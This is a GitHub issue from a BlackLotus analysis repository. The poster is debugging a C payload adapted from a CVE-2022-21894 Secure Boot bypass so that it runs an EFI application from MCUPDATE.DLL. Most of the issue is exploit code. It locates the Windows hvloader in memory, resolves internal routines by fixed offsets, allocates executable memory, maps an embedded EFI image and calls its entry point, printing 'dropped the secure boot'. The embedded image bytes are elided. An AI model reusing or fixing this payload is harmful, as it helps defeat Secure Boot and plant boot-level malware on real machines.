
blacklotus-analysis-stage2-bootkit-rootkit-stage's Issues

How to call an efi from MCUPDATE.DLL

Hello Mr.,
Please take a look at this code (ref: https://github.com/ASkyeye/CVE-2022-21894-Payload/blob/master/main.c#L43):

`#include <windows.h>
#include <winternl.h>


// Calling-convention tag for the loader-internal routines typed below.
// NOTE(review): __cdecl is a 32-bit MSVC convention keyword; on x64 MSVC it is
// accepted but has no effect -- confirm which target this listing was built for.
#define EFIAPI				__cdecl

// Byte-by-byte copy loop used in place of memcpy (no CRT is assumed here).
// Reviewer notes:
//  - Dest and Src are not parenthesized and the trailing ';' is part of the
//    expansion, so it is only safe as a standalone statement with plain identifiers.
//  - There is no bound of its own: every caller must guarantee that Length bytes
//    fit in Dest and are readable from Src.
#define MEMCPY(Dest, Src, Length)	for(UINT64 i = 0; i < (Length); i++) Dest[i] = Src[i];

//Defines taken from https://github.com/btbd/umap/
// Memory type / attribute values passed to the loader's image-buffer allocator
// below; their meaning cannot be verified from this listing alone.
#define BL_MEMORY_TYPE_APPLICATION  (0xE0000012)
#define BL_MEMORY_ATTRIBUTE_RWX     (0x424000)

// Argument values for the BLP_ARCH_SWITCH_CONTEXT routine typed below.
// Default enumerator values: ApplicationContext == 0, FirmwareContext == 1.
typedef enum E_EXECUTION_CONTEXT
{
	ApplicationContext,
	FirmwareContext
}EXECUTION_CONTEXT, * PEXECUTION_CONTEXT;

typedef DWORD64 EFI_STATUS;		// 64-bit status word returned by the entry-point types below
typedef unsigned short CHAR16;	// 16-bit character type for the string argument of print_entry

// Function-pointer types for routines that are never imported: McUpdateEntry
// resolves each one by a fixed offset into another image. The parameter lists
// are as the author declared them and cannot be checked against a header here.
typedef void(EFIAPI* BLP_ARCH_SWITCH_CONTEXT)(EXECUTION_CONTEXT newContext);
typedef NTSTATUS(EFIAPI* BL_IMG_ALLOCATE_IMAGE_BUFFER)(PVOID* imageBuffer, INT64 imageSize, INT32 memoryType, INT32 attributes, INT32 unused, BOOLEAN flags);
typedef EFI_STATUS(EFIAPI* BOOT_ENTRY)(PVOID imageHandle, PVOID systemTable, BLP_ARCH_SWITCH_CONTEXT fpBlpArchSwitchContext);
typedef EFI_STATUS(EFIAPI* print_entry)(PVOID SystemTable, CHAR16* String, ...);




// Raw bytes of the PE/EFI image that McUpdateEntry maps and runs. The page shows
// only the first two bytes ('MZ') followed by a "......" placeholder, so this
// listing as shown does not compile; the author states it held helloworld.efi.
BYTE efiApp[] = { 0x4D, 0x5A ,......}; // here was my hex code  helloworld.efi 





/*
 * McUpdateEntry
 *
 * Maps the PE image embedded in efiApp into a buffer obtained from the hosting
 * image and transfers control to that image's entry point. Nothing is resolved
 * through a header or export table: every routine and data pointer is read at a
 * fixed offset from functionTableIn[3] or from the MZ header found by scanning
 * downward from it, and those offsets are only validated by comparing the host
 * image's OptionalHeader.CheckSum with 0xEC35E -- the code is pinned to one
 * specific build of the host image.
 *
 * functionTableOut: neither read nor written.
 * functionTableIn : only element [3] is used, as an address inside the host image.
 *
 * Return: never returns. Every path (success and every 'goto Done') ends in
 * 'while (1);', so the trailing 'return 0' is unreachable.
 */
DWORD McUpdateEntry(PVOID* functionTableOut, PVOID* functionTableIn)
{
	BOOT_ENTRY entry;
	BL_IMG_ALLOCATE_IMAGE_BUFFER fpBlImgAllocateImageBuffer;
	BLP_ARCH_SWITCH_CONTEXT fpBlpArchSwitchContext;
	PIMAGE_DOS_HEADER hvDosHeader, efiDosHeader = (PIMAGE_DOS_HEADER)efiApp;
	PIMAGE_NT_HEADERS hvNtHeaders, efiNtHeaders = (PIMAGE_NT_HEADERS)(efiApp + efiDosHeader->e_lfanew);
	PIMAGE_SECTION_HEADER secHeader, section;
	PBYTE imageBuffer = NULL, src, dest;
	PVOID hvLoaderAddr, printProc, hvLoaderBase = NULL, efiSystemTable, efiImageHandle, printSystemTable;
	DWORD64 imageSize = efiNtHeaders->OptionalHeader.SizeOfImage;	// efiApp's headers are trusted as-is: no magic or size validation

	// 1. Locate the host image. functionTableIn[3] is taken as an address inside
	//    it; a print routine (+0xAE48) and a pointer (+0x11093C) are then read at
	//    fixed offsets from that address. Note that these reads and the print()
	//    call below happen *before* the CheckSum pin further down.
	hvLoaderAddr = functionTableIn[3];
	printProc = (PVOID)((DWORD_PTR)hvLoaderAddr + 0xAE48);
	printSystemTable = *(PVOID*)((DWORD_PTR)hvLoaderAddr + 0x11093C);
	print_entry print = (print_entry)(printProc);
	// First argument is the pointer stored at +0x40 of printSystemTable.
	print((*(PVOID*)((DWORD_PTR)printSystemTable + 0x40)), L"dropped the secure boot by MAHA1 :\n");

	// Scan downward from printProc for a DOS header: 'MZ' plus two fixed header
	// bytes (0x90 at +2, 0x03 at +4). The only stop condition is the pointer
	// reaching NULL -- there is no lower bound, and whether each byte is readable
	// is not checked, so a miss keeps walking through arbitrary memory.
	for (PBYTE searchAddr = printProc; searchAddr; searchAddr--)
	{
		if (searchAddr[0] == 'M' && searchAddr[1] == 'Z' && searchAddr[2] == 0x90 && searchAddr[4] == 0x03)
		{
			hvLoaderBase = searchAddr;
			break;
		}
	}

	if (!hvLoaderBase)
		goto Done;

	hvDosHeader = (PIMAGE_DOS_HEADER)hvLoaderBase;
	hvNtHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)hvLoaderBase + hvDosHeader->e_lfanew);

	// Build pin: all offsets used below (0x3CC0C, 0xC550, 0x113670, 0x1136C8) are
	// only meaningful for the host image whose CheckSum is 0xEC35E. Any other
	// build bails out here (into the spin at Done).
	if (hvNtHeaders->OptionalHeader.CheckSum != 0xEC35E)		//It's better to have one check too much than too few
		goto Done;

	// Resolve two loader-internal routines and two globals by offset from the
	// image base found above.
	fpBlImgAllocateImageBuffer = (BL_IMG_ALLOCATE_IMAGE_BUFFER)((DWORD_PTR)hvLoaderBase + 0x3CC0C);
	fpBlpArchSwitchContext = (PVOID)((DWORD_PTR)hvLoaderBase + 0xC550);

	efiImageHandle = *(PVOID*)((DWORD_PTR)hvLoaderBase + 0x113670);
	efiSystemTable = *(PVOID*)((DWORD_PTR)hvLoaderBase + 0x1136C8);

	//2. Allocate 1:1 PA-VA buffer
	// Requested with BL_MEMORY_ATTRIBUTE_RWX, i.e. one region that is both
	// writable and executable, sized directly from efiApp's SizeOfImage.
	// '0b00000001' is a binary literal (a compiler extension before C23).
	if (!NT_SUCCESS(fpBlImgAllocateImageBuffer(&imageBuffer, imageSize, BL_MEMORY_TYPE_APPLICATION, BL_MEMORY_ATTRIBUTE_RWX, 0, 0b00000001)))
		goto Done;

	if (!imageBuffer)
		goto Done;

	//3. Copy headers
	// MEMCPY has no bound of its own; SizeOfHeaders is not checked against imageSize.
	MEMCPY(imageBuffer, efiApp, efiNtHeaders->OptionalHeader.SizeOfHeaders);

	//4. Map sections
	// Section table begins immediately after the optional header.
	secHeader = (PIMAGE_SECTION_HEADER)((UINT64)&efiNtHeaders->OptionalHeader + efiNtHeaders->FileHeader.SizeOfOptionalHeader);

	for (WORD i = 0; i < efiNtHeaders->FileHeader.NumberOfSections; i++)
	{
		section = &secHeader[i];

		// Only sections with raw data are copied.
		if (section->SizeOfRawData)
		{
			dest = (PVOID)(imageBuffer + section->VirtualAddress);
			src = (PVOID)(efiApp + section->PointerToRawData);

			// Neither VirtualAddress + SizeOfRawData <= imageSize nor
			// PointerToRawData + SizeOfRawData <= sizeof efiApp is checked
			// before this copy.
			MEMCPY(dest, src, section->SizeOfRawData);
		}
	}

	//5. Call entry point
	if (efiNtHeaders->OptionalHeader.AddressOfEntryPoint)
	{
		/*
		* We use a custom entry point to pass the address of BlpArchSwitchContext to our EFI application.
		* Before it can call EFI services, it needs to call BlpArchSwitchContext with 'FirmwareContext' as argument (and revert this before returning).
		*/


		//fpBlpArchSwitchContext(0);
		entry = (BOOT_ENTRY)(imageBuffer + efiNtHeaders->OptionalHeader.AddressOfEntryPoint);
		print((*(PVOID*)((DWORD_PTR)printSystemTable + 0x40)), L"dropped the secure boot by MAHA==2 :\n");

		//fpBlpArchSwitchContext(1);   ///when i tried to call this function fpBlpArchSwitchContext(1) it stuck  
		// Three-argument call matching the non-standard BOOT_ENTRY typedef: the
		// mapped image receives the loader's context-switch routine as its third
		// argument.
		entry(efiImageHandle, efiSystemTable, fpBlpArchSwitchContext); // it is  exit and not printing any text 


	}

Done:
	// Unconditional spin, reached both after entry() returns and from every
	// failure 'goto' above; the 'return 0' that follows is dead code.
	while (1);	
		return 0;
}`
